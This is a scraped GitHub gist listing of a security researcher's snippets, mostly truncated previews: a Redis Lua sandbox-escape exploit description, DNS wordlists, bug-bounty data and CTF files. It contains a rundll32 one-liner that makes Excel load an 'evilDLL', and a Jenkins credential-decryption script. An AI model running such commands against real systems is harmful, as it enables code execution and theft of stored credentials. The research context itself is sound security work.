Skip to content

Instantly share code, notes, and snippets.

🍊
This is orange!

Orange Tsai orangetw

🍊
This is orange!
Block or report user

Report or block orangetw

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@orangetw
orangetw / redis-lua-linux-x86-poc.py
Created Feb 12, 2019 — forked from c3c/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
View redis-lua-linux-x86-poc.py
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
View introspection-query.graphql
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
@orangetw
orangetw / all.txt
Created Sep 7, 2018 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@orangetw
orangetw / Advanced-HTTP-en.md
Created Nov 19, 2017 — forked from nicolas-grekas/Advanced-HTTP-en.md
Advanced handling of HTTP requests in PHP
View Advanced-HTTP-en.md
View jenkins-decrypt.groovy
#To Decrypt Jenkins Password from credentials.xml
#<username>jenkins</username>
#<passphrase>your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase>
#go to the jenkins url
http://jenkins-host/script
#In the console paste the script
hashed_pw='your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J'
@orangetw
orangetw / excel.bat
Created Jul 22, 2017 — forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
View excel.bat
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
View bounties.csv
cve product bounty source
CVE-2014-0257 .NET Framework 5,000.00 https://hackerone.com/reports/18851
CVE-2015-3842 Android 2,000.00 https://code.google.com/p/android/issues/detail?id=177610
CVE-2015-3847 Android 1,500.00 https://code.google.com/p/android/issues/detail?id=179147
CVE-2015-3860 Android 500.00 https://code.google.com/p/android/issues/detail?id=178139
CVE-2015-3862 Android 333.00 https://code.google.com/p/android/issues/detail?id=181895
CVE-2015-3865 Android 1,500.00 https://code.google.com/p/android/issues/detail?id=182294
CVE-2015-3867 Android 4,000.00 https://code.google.com/p/android/issues/detail?id=182838
CVE-2015-3868 Android 4,000.00 https://code.google.com/p/android/issues/detail?id=182146
CVE-2015-3869 Android 3,000.00 https://code.google.com/p/android/issues/detail?id=182053
View ruby_revealer.sh
#!/usr/bin/sudo sh
## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.
## From `strings ruby_concealer.so`:
##
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
##
## Well, good, as long as its not intended to discourage *me* from doing this!
@orangetw
orangetw / nanana.xxd
Created Oct 19, 2015
HITCON CTF 2015 Quals nanana
View nanana.xxd
0000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
0000010: 0200 3e00 0100 0000 2008 4000 0000 0000 ..>..... .@.....
0000020: 4000 0000 0000 0000 c811 0000 0000 0000 @...............
0000030: 0000 0000 4000 3800 0900 4000 1c00 1b00 ....@.8...@.....
0000040: 0600 0000 0500 0000 4000 0000 0000 0000 ........@.......
0000050: 4000 4000 0000 0000 4000 4000 0000 0000 @.@.....@.@.....
0000060: f801 0000 0000 0000 f801 0000 0000 0000 ................
0000070: 0800 0000 0000 0000 0300 0000 0400 0000 ................
0000080: 3802 0000 0000 0000 3802 4000 0000 0000 8.......8.@.....
0000090: 3802 4000 0000 0000 1c00 0000 0000 0000 8.@.............
@orangetw
orangetw / index.php
Created Oct 19, 2015
HITCON CTF 2015 Quals Giraffe's Coffee
View index.php
<?php
include "config.php";
mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($dbname);
function escape($str){
$str = strtolower($str);
$str = str_replace("'", "", $str);
$str = str_replace("\\", "", $str);
You can’t perform that action at this time.